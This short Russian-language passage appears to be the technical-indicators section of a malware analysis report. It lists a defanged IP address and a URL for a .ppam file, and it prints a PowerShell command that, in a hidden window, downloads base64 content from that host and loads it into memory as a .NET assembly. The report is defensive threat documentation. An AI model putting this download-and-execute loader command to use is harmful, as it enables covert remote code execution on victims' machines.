Техническая информация
- http://17#.#74.176.153/dll/nostartup.ppam
- '17#.#74.176.153':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://17#.#74.176.153/dll/NoStartUp.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType... (со скрытым окном)